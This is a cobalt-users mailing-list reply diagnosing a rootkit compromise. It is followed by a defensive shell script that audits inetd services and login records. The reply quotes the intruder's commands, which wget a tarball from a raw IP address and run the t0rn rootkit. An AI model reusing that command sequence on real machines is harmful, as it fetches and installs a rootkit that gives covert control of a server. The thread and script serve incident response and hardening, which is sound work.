
Re: [cobalt-users] access problem solved.



> seems more like our admin guy installing stuff that has caused the
> prob rather
> than a hack attack.
> wget ftp://65.33.193.89/pub/tk.tar.gz
> tar -vzxf tk.tar.gz
> cd tk
> ./t0rn 52F32678 14780
> rewt
> exit

Umm - hey Gerald, if your 'admin guy' is installing a t0rn rootkit on
your server, then you need to fire his ass - your box has been hacked.
Someone got in, installed SSH2 so they'd have a way to get into the
machine - I really *don't* think that this was your admin guy - note
how he uses ftp to get the 'wget' package first to make it easier to
download the other packages. Wget is already installed on the Cobalts
and your admin guy would know this.
Then whoever it was installed the t0rn rootkit, which turned off ftp
and telnet access so that only *he* could get into the machine via
SSH2.

You've been hacked. Check your last log (by doing "last | less" from
the command line, no quotes) to see if he left that intact so you can
see who he logged in as.

Let me repeat - YOU'VE BEEN HACKED.
I'm glad you got your access back, but now it's time to do some
clean-up; and the first order of business is to change ALL passwords
and turn off that damn telnet - I'd be willing to bet that's how he
got in (and subsequently why he turned it off; so that no one else
could get in that way). If you need a free SSH2 client, check out
Putty (just do a search on Google for Putty).

My condolences, Gerald.

CarrieB
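A defender-side check for the two clean-up steps the reply above recommends: review who has logged in recently and get telnet/ftp out of inetd. This is an added example, not part of the original thread or of Cobalt's own tooling. The inetd.conf excerpt and the last(1) output are constructed samples; the hostnames and addresses in them are placeholders from documentation ranges, and the allowlist of known admin hosts is an assumption you would replace with your own.

```shell
#!/bin/sh
# Constructed sample of an /etc/inetd.conf on a late-1990s Linux box.
# Cleartext-login services (ftp, telnet) are still active here.
SAMPLE_INETD='# /etc/inetd.conf - constructed sample, not a real file
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd
pop-3   stream  tcp  nowait  root  /usr/sbin/tcpd  ipop3d
'

# Constructed sample of "last" output. 203.0.113.45 is a placeholder
# address standing in for an unknown remote host; 192.0.2.10 plays the
# legitimate admin workstation.
SAMPLE_LAST='root     pts/1        203.0.113.45     Mon Jun 11 03:12 - 03:40  (00:28)
gerald   pts/0        192.0.2.10       Sun Jun 10 21:05 - 22:11  (01:06)
reboot   system boot  kernel-placeholder  Sun Jun 10 20:58         (2+06:14)
admin    tty1                          Sun Jun 10 20:59 - 21:00  (00:01)

wtmp begins Fri Jun  1 00:00:01 2001'

# Print the names of cleartext-credential services that inetd will start
# (lines that are neither commented out nor blank). $1 is the config text.
find_cleartext_services() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        $1 ~ /^(telnet|ftp|shell|login|exec)$/ { print $1 }
    '
}

# Emit a hardened copy of the config with those services commented out,
# leaving every other line untouched so the result is still a valid inetd.conf.
disable_cleartext_services() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { print; next }
        $1 ~ /^(telnet|ftp|shell|login|exec)$/ {
            print "#" $0 "   # disabled: cleartext credentials"
            next
        }
        { print }
    '
}

# From last(1)-style output ($1), report remote logins (pts/ or ttyp
# terminals) whose source host is not in the space-separated allowlist ($2).
# Console logins, reboot records and the wtmp footer are skipped.
flag_remote_logins() {
    printf '%s\n' "$1" | awk -v allow="$2" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $2 ~ /^(pts\/|ttyp)/ && !($3 in ok) { print $1 "@" $3 }
    '
}

# Stand-alone run against the constructed samples.
echo "Active cleartext services:"
find_cleartext_services "$SAMPLE_INETD"
echo
echo "Hardened inetd.conf:"
disable_cleartext_services "$SAMPLE_INETD"
echo
echo "Remote logins from hosts outside the allowlist:"
flag_remote_logins "$SAMPLE_LAST" "192.0.2.10"
```

On a real system you would feed `cat /etc/inetd.conf` and `last` into these functions instead of the samples, then restart inetd (`kill -HUP` on its pid) after installing the hardened file. The login check is only meaningful if the intruder left wtmp alone, which is exactly the caveat the reply raises; treat an empty or suspiciously short `last` as a finding in itself rather than as a clean result.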